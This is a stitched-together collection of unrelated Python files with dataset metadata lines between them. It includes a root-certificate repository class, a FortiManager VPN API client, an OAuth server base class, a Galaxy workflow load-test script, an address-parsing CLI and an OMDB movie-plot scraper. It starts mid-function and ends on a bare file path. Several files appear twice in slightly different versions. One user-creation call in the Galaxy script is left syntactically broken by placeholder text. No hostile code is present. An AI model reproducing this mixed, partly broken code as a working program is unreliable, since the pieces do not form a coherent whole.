        with open(pem_path, mode='r') as pem_file:
            cert_pem = pem_file.read()

        # Parse the certificate to double check the fingerprint
        parsed_cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend())
        if fingerprint != parsed_cert.fingerprint(SHA256()):
            # Bug fix: hexlify() was previously applied to the result of
            # .decode('ascii') (a str), which raises TypeError instead of
            # producing the message; decode must happen AFTER hexlify.
            cert_fingerprint = hexlify(parsed_cert.fingerprint(SHA256())).decode('ascii')
            raise ValueError(f'Fingerprint mismatch for certificate :{hex_fingerprint} VS {cert_fingerprint}')
        return parsed_cert

    def store_certificate(self, certificate: Certificate) -> Path:
        """Store the supplied certificate as a PEM file.
        """
        # A given certificate's path is always <SHA-256>.pem.
        cert_file_name = hexlify(certificate.fingerprint(SHA256())).decode('ascii')
        cert_path = self._path / f'{cert_file_name}.pem'

        # If the cert is NOT already there, add it
        if not cert_path.exists():
            with open(cert_path, 'w') as cert_file:
                cert_file.write(certificate.public_bytes(Encoding.PEM).decode('ascii'))
        return cert_path
from binascii import hexlify from pathlib import Path import os from typing import Union, List from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.hashes import SHA256 from cryptography.hazmat.primitives.serialization import Encoding from cryptography.x509 import Certificate, load_pem_x509_certificate class CertificateNotFoundError(KeyError): pass class RootCertificatesRepository: """A local folder where we store as many root certificates (as PEM files) as possible. """ def __init__(self, local_root_path: Path) -> None: self._path = local_root_path all_certificates = [] for pem_file_path in self._path.glob('*.pem'): with open(pem_file_path) as pem_file: cert_pem = pem_file.read() cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) all_certificates.append(cert) self._all_certificates = all_certificates # Parse each certificate so we can look them up with SHA1 self._sha1_map = {cert.fingerprint(hashes.SHA1()): cert for cert in self._all_certificates} @classmethod def get_default(cls) -> 'RootCertificatesRepository': root_path = Path(os.path.abspath(os.path.dirname(__file__))) / '..' 
/ 'certificates' return cls(root_path) def get_all_certificates(self) -> List[Certificate]: return self._all_certificates def lookup_certificate_with_fingerprint( self, fingerprint: bytes, hash_algorithm: Union[hashes.SHA1, hashes.SHA256] = hashes.SHA256(), ) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') if isinstance(hash_algorithm, hashes.SHA1): try: return self._sha1_map[fingerprint] except KeyError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') elif isinstance(hash_algorithm, hashes.SHA256): try: return self._lookup_certificate_with_sha256_fingerprint(fingerprint) except FileNotFoundError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') else: raise ValueError('Hash algorithm not supported') def _lookup_certificate_with_sha256_fingerprint(self, fingerprint: bytes) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') pem_path = self._path / f'{hex_fingerprint}.pem' with open(pem_path, mode='r') as pem_file: cert_pem = pem_file.read() # Parse the certificate to double check the fingerprint parsed_cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) if fingerprint != parsed_cert.fingerprint(SHA256()): cert_fingerprint = hexlify(parsed_cert.fingerprint(SHA256()).decode('ascii')) hex_fingerprint = hexlify(fingerprint).decode('ascii') raise ValueError(f'Fingerprint mismatch for certificate :{hex_fingerprint} VS {cert_fingerprint}') return parsed_cert def store_certificate(self, certificate: Certificate) -> Path: """Store the supplied certificate as a PEM file. """ # A given certificate's path is always <SHA-256>.pem. 
cert_file_name = hexlify(certificate.fingerprint(SHA256())).decode('ascii') cert_path = self._path / f'{cert_file_name}.pem' # If the cert is NOT already there, add it if not cert_path.exists(): with open(cert_path, 'w') as cert_file: cert_file.write(certificate.public_bytes(Encoding.PEM).decode('ascii')) return cert_path
en
0.899665
A local folder where we store as many root certificates (as PEM files) as possible. # Parse each certificate so we can look them up with SHA1 # Parse the certificate to double check the fingerprint Store the supplied certificate as a PEM file. # A given certificate's path is always <SHA-256>.pem. # If the cert is NOT already there, add it
2.580744
3
LargeScaleDeployment/fortimanager/fmg_api/vpn_manager.py
dmitryperets/testbeds
11
6627859
#!/usr/bin/env python3

from fmg_api.api_base import ApiSession


class VpnManagerApi(ApiSession):
    """FortiManager VPN Manager calls: communities, hub nodes, spoke groups."""

    def addOverlay(self, overlay_name, hub_name, spoke_group, wan_intf, network_id):
        """Create a complete overlay: the community, its hub and its spoke group."""
        self.addVpnCommunity(overlay_name, network_id)
        self.addVpnHub(overlay_name, hub_name, wan_intf)
        self.addVpnSpokeGroup(overlay_name, spoke_group, wan_intf)

    def updateOverlay(self, overlay_name, network_id):
        """Re-apply the community settings of an existing overlay."""
        self.addVpnCommunity(overlay_name, network_id, update=True)

    def getOverlays(self):
        """Return a mapping of community name -> list of member device names."""
        request = {
            "session": self._session,
            "id": 1,
            "method": "get",
            "params": [
                {
                    "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node",
                    "option": [
                        "scope member"
                    ]
                }
            ]
        }
        response = self._run_request(request, name="Get VPN Nodes")

        overlays = {}
        for node in response["result"][0]["data"]:
            community = node["vpntable"][0]
            # Group every node's first scope member under its community.
            overlays.setdefault(community, []).append(node["scope member"][0]["name"])
        return overlays

    def addVpnCommunity(self, community_name, network_id, update=False):
        """Create a VPN community, or update it when update=True."""
        method = "update" if update else "set"
        community_settings = {
            "name": community_name,
            "topology": 2,
            "psk-auto-generate": 1,
            "ike1keylifesec": 28800,
            "ike1dpd": 1,
            "ike1natkeepalive": 10,
            "dpd": 3,
            "dpd-retrycount": 3,
            "dpd-retryinterval": 10,
            "ike2keylifesec": 3600,
            "ike2keylifekbs": 5120,
            "ike2keepalive": 1,
            "intf-mode": 0,
            "fcc-enforcement": 0,
            "ike-version": 2,
            "negotiate-timeout": 30,
            "inter-vdom": 0,
            "auto-zone-policy": 0,
            "npu-offload": 1,
            "authmethod": 1,
            "ike1dhgroup": 12,
            "localid-type": 0,
            "ike1mode": 1,
            "ike1nattraversal": 1,
            "ike1proposal": [
                "aes256gcm-prfsha256"
            ],
            "ike2autonego": 0,
            "ike2dhgroup": 12,
            "ike2keylifetype": 1,
            "pfs": 1,
            "ike2proposal": [
                "aes256gcm"
            ],
            "replay": 1,
            "network-overlay": 1,
            "network-id": network_id
        }
        request = {
            "session": self._session,
            "id": 1,
            "method": method,
            "params": [
                {
                    "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable",
                    "data": community_settings
                }
            ]
        }
        self._run_request(request, name=f"Add VPN Community ({community_name})")

    def addVpnHub(self, community_name, hub_name, wan_intf):
        """Attach a hub node (role 0) to the given community."""
        hub_node = {
            "protected_subnet": {
                "addr": "all",
                "seq": 1
            },
            "scope member": {
                "name": hub_name,
                "vdom": "root"
            },
            "vpntable": community_name,
            "role": 0,
            "iface": wan_intf,
            "automatic_routing": 0,
            "mode-cfg": 0,
            "net-device": 0,
            "tunnel-search": 1,
            "add-route": 0,
            "peertype": 1,
            "auto-configuration": 0
        }
        request = {
            "session": self._session,
            "id": 1,
            "method": "set",
            "params": [
                {
                    "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node",
                    "data": [hub_node]
                }
            ]
        }
        self._run_request(request, name=f"Add VPN Hub {hub_name} to {community_name}")

    def addVpnSpokeGroup(self, community_name, spoke_group, wan_intf):
        """Attach a spoke-group node (role 1) to the given community."""
        spoke_node = {
            "protected_subnet": {
                "addr": "all",
                "seq": 1
            },
            "scope member": {
                "name": spoke_group
            },
            "vpntable": community_name,
            "role": 1,
            "iface": wan_intf,
            "automatic_routing": 0,
            "add-route": 0,
            "mode-cfg": 0,
            "assign-ip": 0,
            "net-device": 1,
            "peertype": 8
        }
        request = {
            "session": self._session,
            "id": 1,
            "method": "set",
            "params": [
                {
                    "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node",
                    "data": [spoke_node]
                }
            ]
        }
        self._run_request(request, name=f"Add VPN Spoke Group {spoke_group} to {community_name}")

    def deleteVpnCommunity(self, community_name):
        """Delete a VPN community by name."""
        request = {
            "session": self._session,
            "id": 1,
            "method": "delete",
            "params": [
                {
                    "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable/" + community_name
                }
            ]
        }
        self._run_request(request, name=f"Delete VPN Community {community_name}")
#!/usr/bin/env python3 from fmg_api.api_base import ApiSession class VpnManagerApi(ApiSession): ############################################################## # Add Overlay ############################################################## def addOverlay(self, overlay_name, hub_name, spoke_group, wan_intf, network_id): self.addVpnCommunity(overlay_name, network_id) self.addVpnHub(overlay_name, hub_name, wan_intf) self.addVpnSpokeGroup(overlay_name, spoke_group, wan_intf) ############################################################## # Update Overlay ############################################################## def updateOverlay(self, overlay_name, network_id): self.addVpnCommunity(overlay_name, network_id, update=True) ############################################################## # Get Overlays ############################################################## def getOverlays(self): overlay_list = {} payload = { "session": self._session, "id": 1, "method": "get", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "option": [ "scope member" ] } ] } content = self._run_request(payload, name="Get VPN Nodes") for node in content["result"][0]["data"]: community = node["vpntable"][0] if community not in overlay_list: overlay_list[community] = [] overlay_list[community].append(node["scope member"][0]["name"]) return overlay_list ############################################################## # Add VPN Community ############################################################## def addVpnCommunity(self, community_name, network_id, update=False): payload = { "session": self._session, "id": 1, "method": "set" if not update else "update", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable", "data": { "name": community_name, "topology": 2, "psk-auto-generate": 1, "ike1keylifesec": 28800, "ike1dpd": 1, "ike1natkeepalive": 10, "dpd": 3, "dpd-retrycount": 3, "dpd-retryinterval": 10, "ike2keylifesec": 3600, "ike2keylifekbs": 5120, 
"ike2keepalive": 1, "intf-mode": 0, "fcc-enforcement": 0, "ike-version": 2, "negotiate-timeout": 30, "inter-vdom": 0, "auto-zone-policy": 0, "npu-offload": 1, "authmethod": 1, "ike1dhgroup": 12, "localid-type": 0, "ike1mode": 1, "ike1nattraversal": 1, "ike1proposal": [ "aes256gcm-prfsha256" ], "ike2autonego": 0, "ike2dhgroup": 12, "ike2keylifetype": 1, "pfs": 1, "ike2proposal": [ "aes256gcm" ], "replay": 1, "network-overlay": 1, "network-id": network_id } } ] } self._run_request(payload, name=f"Add VPN Community ({community_name})") ############################################################## # Add VPN Hub ############################################################## def addVpnHub(self, community_name, hub_name, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": hub_name, "vdom": "root" }, "vpntable": community_name, "role": 0, "iface": wan_intf, "automatic_routing": 0, "mode-cfg": 0, "net-device": 0, "tunnel-search": 1, "add-route": 0, "peertype": 1, "auto-configuration": 0 } ] } ] } self._run_request(payload, name=f"Add VPN Hub {hub_name} to {community_name}") ############################################################## # Add VPN Spoke Group ############################################################## def addVpnSpokeGroup(self, community_name, spoke_group, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": spoke_group }, "vpntable": community_name, "role": 1, "iface": wan_intf, "automatic_routing": 0, "add-route": 0, "mode-cfg": 0, "assign-ip": 0, "net-device": 1, "peertype": 8 } ] } ] } self._run_request(payload, name=f"Add VPN Spoke Group {spoke_group} to {community_name}") 
############################################################## # Delete VPN Community ############################################################## def deleteVpnCommunity(self, community_name): payload = { "session": self._session, "id": 1, "method": "delete", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable/" + community_name } ] } self._run_request(payload, name=f"Delete VPN Community {community_name}")
de
0.821471
#!/usr/bin/env python3 ############################################################## # Add Overlay ############################################################## ############################################################## # Update Overlay ############################################################## ############################################################## # Get Overlays ############################################################## ############################################################## # Add VPN Community ############################################################## ############################################################## # Add VPN Hub ############################################################## ############################################################## # Add VPN Spoke Group ############################################################## ############################################################## # Delete VPN Community ##############################################################
1.892488
2
src/aioauth/base/server.py
danygielow/aioauth
0
6627860
from typing import Dict, Optional, Type, Union

from ..grant_type import (
    AuthorizationCodeGrantType,
    ClientCredentialsGrantType,
    GrantTypeBase,
    PasswordGrantType,
    RefreshTokenGrantType,
)
from ..response_type import (
    ResponseTypeAuthorizationCode,
    ResponseTypeBase,
    ResponseTypeToken,
)
from ..types import EndpointType, GrantType, ResponseType
from .database import BaseDB


class BaseAuthorizationServer:
    """OAuth2 authorization server base.

    Maps each response type / grant type to the handler class that
    services it; handlers can be swapped at runtime via register() /
    unregister().
    """

    # Handlers for the authorize endpoint, keyed by response type.
    response_type: Dict[Optional[ResponseType], Type[ResponseTypeBase]] = {
        ResponseType.TYPE_TOKEN: ResponseTypeToken,
        ResponseType.TYPE_CODE: ResponseTypeAuthorizationCode,
    }

    # Handlers for the token endpoint, keyed by grant type.
    grant_type: Dict[Optional[GrantType], Type[GrantTypeBase]] = {
        GrantType.TYPE_AUTHORIZATION_CODE: AuthorizationCodeGrantType,
        GrantType.TYPE_CLIENT_CREDENTIALS: ClientCredentialsGrantType,
        GrantType.TYPE_PASSWORD: PasswordGrantType,
        GrantType.TYPE_REFRESH_TOKEN: RefreshTokenGrantType,
    }

    def __init__(self, db: BaseDB):
        self.db = db

    def register(
        self,
        endpoint_type: EndpointType,
        server: Union[ResponseType, GrantType],
        endpoint_cls: Union[Type[ResponseTypeBase], Type[GrantTypeBase]],
    ):
        """Install endpoint_cls as the handler for `server` on the given endpoint."""
        registry = getattr(self, endpoint_type)
        registry[server] = endpoint_cls

    def unregister(
        self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType]
    ):
        """Remove the handler registered for `server` on the given endpoint."""
        registry = getattr(self, endpoint_type)
        del registry[server]
<filename>src/aioauth/base/server.py from typing import Dict, Optional, Type, Union from ..grant_type import ( AuthorizationCodeGrantType, ClientCredentialsGrantType, GrantTypeBase, PasswordGrantType, RefreshTokenGrantType, ) from ..response_type import ( ResponseTypeAuthorizationCode, ResponseTypeBase, ResponseTypeToken, ) from ..types import EndpointType, GrantType, ResponseType from .database import BaseDB class BaseAuthorizationServer: response_type: Dict[Optional[ResponseType], Type[ResponseTypeBase]] = { ResponseType.TYPE_TOKEN: ResponseTypeToken, ResponseType.TYPE_CODE: ResponseTypeAuthorizationCode, } grant_type: Dict[Optional[GrantType], Type[GrantTypeBase]] = { GrantType.TYPE_AUTHORIZATION_CODE: AuthorizationCodeGrantType, GrantType.TYPE_CLIENT_CREDENTIALS: ClientCredentialsGrantType, GrantType.TYPE_PASSWORD: PasswordGrantType, GrantType.TYPE_REFRESH_TOKEN: RefreshTokenGrantType, } def __init__(self, db: BaseDB): self.db = db def register( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType], endpoint_cls: Union[Type[ResponseTypeBase], Type[GrantTypeBase]], ): endpoint_dict = getattr(self, endpoint_type) endpoint_dict[server] = endpoint_cls def unregister( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType] ): endpoint_dict = getattr(self, endpoint_type) del endpoint_dict[server]
none
1
1.992781
2
test/manual/workflows_scaling.py
BalthazarPavot/galaxy_project_reports
1
6627861
import functools
import json
import os
import random
import sys
from threading import Thread
from uuid import uuid4

galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [
    os.path.join(galaxy_root, "lib"),
    os.path.join(galaxy_root, "test"),
]

try:
    from argparse import ArgumentParser
except ImportError:
    ArgumentParser = None

import requests
from bioblend import galaxy

from api import helpers, yaml_to_workflow

LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."


def main(argv=None):
    """Build a synthetic workflow of the requested shape and run it.

    Creates a fresh Galaxy user, imports a generated workflow, and
    invokes it `--workflow_count` times in parallel threads.
    """
    if ArgumentParser is None:
        raise Exception("Test requires Python 2.7")

    arg_parser = ArgumentParser(description=DESCRIPTION)
    arg_parser.add_argument("--api_key", default="testmasterapikey")
    arg_parser.add_argument("--host", default="http://localhost:8080/")
    arg_parser.add_argument("--collection_size", type=int, default=20)
    arg_parser.add_argument("--workflow_depth", type=int, default=10)
    arg_parser.add_argument("--two_outputs", default=False, action="store_true")
    arg_parser.add_argument("--workflow_count", type=int, default=1)
    args = arg_parser.parse_args(argv)

    uuid = str(uuid4())
    workflow_struct = _workflow_struct(args, uuid)
    gi = _gi(args)

    workflow = yaml_to_workflow.python_to_workflow(workflow_struct)
    workflow_info = gi.workflows.import_workflow_json(workflow)
    workflow_id = workflow_info["id"]

    target = functools.partial(_run, args, gi, workflow_id, uuid)
    threads = []
    for i in range(args.workflow_count):
        t = Thread(target=target)
        t.daemon = True
        t.start()
        threads.append(t)
    for t in threads:
        t.join()


def _run(args, gi, workflow_id, uuid):
    """Create a history with an input collection and invoke the workflow once."""
    dataset_populator = GiDatasetPopulator(gi)
    dataset_collection_populator = GiDatasetCollectionPopulator(gi)

    history_id = dataset_populator.new_history()

    contents = []
    for i in range(args.collection_size):
        contents.append("random dataset number #%d" % i)
    hdca = dataset_collection_populator.create_list_in_history(history_id, contents=contents).json()

    # The workflow's input collection is wired up by the input step's uuid.
    label_map = {
        uuid: {"src": "hdca", "id": hdca["id"]},
    }
    workflow_request = dict(
        history="hist_id=%s" % history_id,
    )
    workflow_request["inputs"] = json.dumps(label_map)
    url = "workflows/%s/usage" % workflow_id
    invoke_response = dataset_populator._post(url, data=workflow_request).json()
    invocation_id = invoke_response["id"]

    workflow_populator = GiWorkflowPopulator(gi)
    workflow_populator.wait_for_workflow(workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT)


class GiPostGetMixin:
    """Adapt the populator helpers to issue requests through a bioblend GalaxyInstance."""

    def _get(self, route):
        return self._gi.make_get_request(self.__url(route))

    def _post(self, route, data=None):
        # Fix: 'data={}' was a mutable default argument shared between
        # calls; use a None sentinel and copy the caller's dict so the
        # injected API key never leaks back to the caller.
        data = {} if data is None else data.copy()
        data['key'] = self._gi.key
        return requests.post(self.__url(route), data=data)

    def __url(self, route):
        return self._gi.url + "/" + route


class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin):
    """Dataset populator backed by a bioblend GalaxyInstance."""

    def __init__(self, gi):
        self._gi = gi


class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin):
    """Dataset-collection populator backed by a bioblend GalaxyInstance."""

    def __init__(self, gi):
        self._gi = gi
        self.dataset_populator = GiDatasetPopulator(gi)

    def _create_collection(self, payload):
        create_response = self._post("dataset_collections", data=payload)
        return create_response


class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin):
    """Workflow populator backed by a bioblend GalaxyInstance."""

    def __init__(self, gi):
        self._gi = gi
        self.dataset_populator = GiDatasetPopulator(gi)


def _workflow_struct(args, input_uuid):
    """Dispatch to the single- or two-output workflow generator."""
    if args.two_outputs:
        return _workflow_struct_two_outputs(args, input_uuid)
    else:
        return _workflow_struct_simple(args, input_uuid)


def _workflow_struct_simple(args, input_uuid):
    """Linear chain of cat1 steps, each consuming the previous out_file1."""
    workflow_struct = [
        {"type": "input_collection", "uuid": input_uuid},
        {"tool_id": "cat1", "state": {"input1": _link(0)}}
    ]

    workflow_depth = args.workflow_depth
    for i in range(workflow_depth):
        link = str(i + 1) + "#out_file1"
        workflow_struct.append(
            {"tool_id": "cat1", "state": {"input1": _link(link)}}
        )
    return workflow_struct


def _workflow_struct_two_outputs(args, input_uuid):
    """Linear chain of cat1 steps wiring both outputs of each step forward."""
    workflow_struct = [
        {"type": "input_collection", "uuid": input_uuid},
        {"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}}
    ]

    workflow_depth = args.workflow_depth
    for i in range(workflow_depth):
        link1 = str(i + 1) + "#out_file1"
        link2 = str(i + 1) + "#out_file2"
        workflow_struct.append(
            {"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}}
        )
    return workflow_struct


def _link(link):
    return {"$link": link}


def _gi(args):
    """Create a throwaway Galaxy user and return a GalaxyInstance for it."""
    gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
    name = "wftest-user-%d" % random.randint(0, 1000000)

    # Fix: the email/password arguments were replaced by anonymization
    # placeholders (<EMAIL>/<PASSWORD>) in this copy, leaving invalid
    # syntax. NOTE(review): the literals below restore valid syntax but
    # should be confirmed against the upstream script.
    user = gi.users.create_local_user(name, "%s@example.org" % name, "testpassword")
    user_id = user["id"]
    api_key = gi.users.create_user_apikey(user_id)
    user_gi = galaxy.GalaxyInstance(args.host, api_key)
    return user_gi


if __name__ == "__main__":
    main()
import functools import json import os import random import sys from threading import Thread from uuid import uuid4 galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) sys.path[1:1] = [ os.path.join( galaxy_root, "lib" ), os.path.join( galaxy_root, "test" ) ] try: from argparse import ArgumentParser except ImportError: ArgumentParser = None import requests from bioblend import galaxy from api import helpers, yaml_to_workflow LONG_TIMEOUT = 1000000000 DESCRIPTION = "Script to exercise the workflow engine." def main(argv=None): if ArgumentParser is None: raise Exception("Test requires Python 2.7") arg_parser = ArgumentParser(description=DESCRIPTION) arg_parser.add_argument("--api_key", default="testmasterapikey") arg_parser.add_argument("--host", default="http://localhost:8080/") arg_parser.add_argument("--collection_size", type=int, default=20) arg_parser.add_argument("--workflow_depth", type=int, default=10) arg_parser.add_argument("--two_outputs", default=False, action="store_true") arg_parser.add_argument("--workflow_count", type=int, default=1) args = arg_parser.parse_args(argv) uuid = str(uuid4()) workflow_struct = _workflow_struct(args, uuid) gi = _gi(args) workflow = yaml_to_workflow.python_to_workflow(workflow_struct) workflow_info = gi.workflows.import_workflow_json(workflow) workflow_id = workflow_info["id"] target = functools.partial(_run, args, gi, workflow_id, uuid) threads = [] for i in range(args.workflow_count): t = Thread(target=target) t.daemon = True t.start() threads.append(t) for t in threads: t.join() def _run(args, gi, workflow_id, uuid): dataset_populator = GiDatasetPopulator(gi) dataset_collection_populator = GiDatasetCollectionPopulator(gi) history_id = dataset_populator.new_history() contents = [] for i in range(args.collection_size): contents.append("random dataset number #%d" % i) hdca = dataset_collection_populator.create_list_in_history( history_id, contents=contents ).json() label_map 
= { uuid: {"src": "hdca", "id": hdca["id"]}, } workflow_request = dict( history="hist_id=%s" % history_id, ) workflow_request[ "inputs" ] = json.dumps( label_map ) url = "workflows/%s/usage" % ( workflow_id ) invoke_response = dataset_populator._post( url, data=workflow_request ).json() invocation_id = invoke_response["id"] workflow_populator = GiWorkflowPopulator(gi) workflow_populator.wait_for_workflow( workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT ) class GiPostGetMixin: def _get(self, route): return self._gi.make_get_request(self.__url(route)) def _post(self, route, data={}): data = data.copy() data['key'] = self._gi.key return requests.post(self.__url(route), data=data) def __url(self, route): return self._gi.url + "/" + route class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _create_collection(self, payload): create_response = self._post( "dataset_collections", data=payload ) return create_response class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _workflow_struct(args, input_uuid): if args.two_outputs: return _workflow_struct_two_outputs(args, input_uuid) else: return _workflow_struct_simple(args, input_uuid) def _workflow_struct_simple(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link = str(i + 1) + "#out_file1" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link)}} ) return workflow_struct def _workflow_struct_two_outputs(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": 
input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link1 = str(i + 1) + "#out_file1" link2 = str(i + 1) + "#out_file2" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}} ) return workflow_struct def _link(link): return {"$link": link} def _gi(args): gi = galaxy.GalaxyInstance(args.host, key=args.api_key) name = "wftest-user-%d" % random.randint(0, 1000000) user = gi.users.create_local_user(name, <EMAIL>" % name, "<PASSWORD>") user_id = user["id"] api_key = gi.users.create_user_apikey(user_id) user_gi = galaxy.GalaxyInstance(args.host, api_key) return user_gi if __name__ == "__main__": main()
none
1
2.368937
2
starter_console.py
a-doom/address-converter
0
6627862
<filename>starter_console.py from address_converter.converter import Converter import argparse import sys def main(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description='''\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...''') parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin) parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout) parser.add_argument('--showinput', '--si', default=0, choices=[0, 1], type=int, help='return <input text>', dest='show_input') parser.add_argument('--showaddress', '--sa', default=0, choices=[0, 1], help='return <resulting formatted address>', type=int, dest='show_address') parser.add_argument('--checkgramm', '--gr', default=0, choices=[0, 1], help='check grammar', type=int, dest='check_grammar') parser.add_argument('--errorlog', '--el', default=0, choices=[0, 1], help='write the error log', type=int, dest='write_error_log') args = parser.parse_args() with Converter(write_error_log=args.write_error_log) as converter: for input_str in args.infile: address_list = converter.convert( address=input_str, is_check_grammar=args.check_grammar) for address in address_list: result = [] if args.show_input: result.append(input_str[:-1]) if args.show_address: result.append(address.calc_address_string()) result.extend([addrobj.aoguid for addrobj in address.addr_path]) args.outfile.write(';'.join(result) + '\n') args.outfile.flush() if __name__ == "__main__": main()
<filename>starter_console.py from address_converter.converter import Converter import argparse import sys def main(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description='''\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...''') parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin) parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout) parser.add_argument('--showinput', '--si', default=0, choices=[0, 1], type=int, help='return <input text>', dest='show_input') parser.add_argument('--showaddress', '--sa', default=0, choices=[0, 1], help='return <resulting formatted address>', type=int, dest='show_address') parser.add_argument('--checkgramm', '--gr', default=0, choices=[0, 1], help='check grammar', type=int, dest='check_grammar') parser.add_argument('--errorlog', '--el', default=0, choices=[0, 1], help='write the error log', type=int, dest='write_error_log') args = parser.parse_args() with Converter(write_error_log=args.write_error_log) as converter: for input_str in args.infile: address_list = converter.convert( address=input_str, is_check_grammar=args.check_grammar) for address in address_list: result = [] if args.show_input: result.append(input_str[:-1]) if args.show_address: result.append(address.calc_address_string()) result.extend([addrobj.aoguid for addrobj in address.addr_path]) args.outfile.write(';'.join(result) + '\n') args.outfile.flush() if __name__ == "__main__": main()
en
0.454603
\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...
3.425565
3
data_gather/get_movie_metadata.py
bkimmig/data-mining-project
1
6627863
import numpy as np import pandas as pd import json import requests # ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # OMDB_API_URL = "http://www.omdbapi.com/?i={}&plot=full&r=json" movie_data = pd.read_csv('../data/movie_metadata.csv') synopses = [] for i in range(len(movie_data)): movie = movie_data['movie_title'][i].rstrip() ## use the IMDB ID to search imdb_id = movie_data['movie_imdb_link'][i].split('/')[4] r = requests.get(OMDB_API_URL.format(imdb_id)) try: mdata = r.json() except: continue d = { 'plot': mdata['Plot'], 'title': mdata['Title'], 'genres': mdata['Genre'] } synopses.append(d) if i%500 == 0: print(i) data = { 'data': synopses, 'length': len(synopses) } with open('../data/movie_metadata.json', 'w') as fp: json.dump(data, fp)
import numpy as np import pandas as pd import json import requests # ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # OMDB_API_URL = "http://www.omdbapi.com/?i={}&plot=full&r=json" movie_data = pd.read_csv('../data/movie_metadata.csv') synopses = [] for i in range(len(movie_data)): movie = movie_data['movie_title'][i].rstrip() ## use the IMDB ID to search imdb_id = movie_data['movie_imdb_link'][i].split('/')[4] r = requests.get(OMDB_API_URL.format(imdb_id)) try: mdata = r.json() except: continue d = { 'plot': mdata['Plot'], 'title': mdata['Title'], 'genres': mdata['Genre'] } synopses.append(d) if i%500 == 0: print(i) data = { 'data': synopses, 'length': len(synopses) } with open('../data/movie_metadata.json', 'w') as fp: json.dump(data, fp)
en
0.621424
# ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # ## use the IMDB ID to search
3.222292
3
gene/analysis/fisher_exact.py
tbj128/gene-expression-analyzer
0
6627864
